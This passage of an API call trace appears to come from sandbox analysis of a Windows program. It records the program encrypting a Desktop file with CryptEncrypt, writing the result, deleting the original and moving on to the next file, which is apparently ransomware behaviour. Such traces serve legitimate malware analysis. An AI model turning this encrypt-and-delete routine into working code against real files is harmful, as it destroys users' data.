lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.645] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x8f2b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x8f30) returned 1 [0122.645] CharLowerBuffW (in: lpsz="byte[36657]", cchLength=0xb | out: lpsz="byte[36657]") returned 0xb [0122.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.646] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49c4db8*, pdwDataLen=0x144e790*=0x8f2b, dwBufLen=0x8f30 | out: pbData=0x49c4db8*, pdwDataLen=0x144e790*=0x8f30) returned 1 [0122.646] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.647] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x8f30, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0x8f30, lpOverlapped=0x0) returned 1 [0122.648] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0122.648] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca8f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.649] CryptDestroyKey (hKey=0x41ac540) returned 1 [0122.649] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.649] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.649] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.649] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0122.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.649] FreeLibrary (hLibModule=0x756e0000) returned 1 [0122.649] CloseHandle (hObject=0x258) returned 1 [0122.649] CloseHandle (hObject=0x2a0) returned 1 [0122.651] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cSg8 emhaX_r.ots", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\cSg8 emhaX_r.ots", lpFilePart=0x0) returned 0x28 [0122.651] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cSg8 emhaX_r.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\csg8 emhax_r.ots")) returned 0x20 [0122.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0122.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0122.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0122.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0122.652] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cSg8 emhaX_r.ots", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e657550, ftCreationTime.dwHighDateTime=0x1d5e6c4, ftLastAccessTime.dwLowDateTime=0x4dbb1970, ftLastAccessTime.dwHighDateTime=0x1d5e605, ftLastWriteTime.dwLowDateTime=0x4dbb1970, ftLastWriteTime.dwHighDateTime=0x1d5e605, nFileSizeHigh=0x0, nFileSizeLow=0x8f2b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="cSg8 emhaX_r.ots", cAlternateFileName="CSG8EM~1.OTS")) returned 0x41ac500 [0122.652] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cSg8 emhaX_r.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\csg8 emhax_r.ots")) returned 1 [0122.658] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e657550, ftCreationTime.dwHighDateTime=0x1d5e6c4, ftLastAccessTime.dwLowDateTime=0x4dbb1970, ftLastAccessTime.dwHighDateTime=0x1d5e605, ftLastWriteTime.dwLowDateTime=0x4dbb1970, ftLastWriteTime.dwHighDateTime=0x1d5e605, nFileSizeHigh=0x0, nFileSizeLow=0x8f2b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="cSg8 emhaX_r.ots", cAlternateFileName="CSG8EM~1.OTS")) returned 0 [0122.658] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0122.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0122.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0122.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0122.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0122.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0122.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0122.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0122.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0122.658] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 1 [0122.658] TranslateMessage (lpMsg=0x144f534) returned 0 [0122.658] DispatchMessageW (lpMsg=0x144f534) returned 0x0 [0122.658] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0122.658] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0122.659] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0122.659] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da070 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0122.659] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.659] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0122.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0122.659] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0122.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0122.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0122.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0122.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0122.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0122.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9940 [0122.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0122.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0122.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0122.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0122.660] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0122.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0122.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0122.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0122.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0122.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.661] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0122.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0122.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0122.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.661] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CtmEppS 7Ks0.swf", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1321e690, ftCreationTime.dwHighDateTime=0x1d5eccc, ftLastAccessTime.dwLowDateTime=0x4cc2b900, ftLastAccessTime.dwHighDateTime=0x1d5e6b0, ftLastWriteTime.dwLowDateTime=0x4cc2b900, ftLastWriteTime.dwHighDateTime=0x1d5e6b0, nFileSizeHigh=0x0, nFileSizeLow=0x17903, dwReserved0=0x0, dwReserved1=0x8, cFileName="CtmEppS 7Ks0.swf", cAlternateFileName="CTMEPP~1.SWF")) returned 0x41ac740 [0122.661] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0122.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0122.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0122.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0122.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0122.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0122.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0122.662] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0122.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0122.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0122.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bd8 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0122.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0122.662] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0122.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0122.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0122.663] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0122.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0122.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0122.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0122.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0122.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b90 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0122.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0122.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0122.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0122.664] 